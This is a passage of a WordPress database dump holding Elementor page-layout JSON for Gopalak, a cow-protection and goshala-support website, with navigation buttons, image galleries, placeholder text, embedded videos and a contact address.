":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9300,1595,'_elementor_page_assets','a:0:{}'),(9302,1596,'_elementor_edit_mode','builder'),(9303,1596,'_elementor_template_type','wp-page'),(9304,1596,'_elementor_version','3.7.8'),(9305,1596,'_wp_page_template','elementor_canvas'),(9306,1596,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9307,1596,'_elementor_page_assets','a:0:{}'),(9309,1597,'_elementor_edit_mode','builder'),(9310,1597,'_elementor_template_type','wp-page'),(9311,1597,'_elementor_version','3.7.8'),(9312,1597,'_wp_page_template','elementor_canvas'),(9313,1597,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adobt\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widget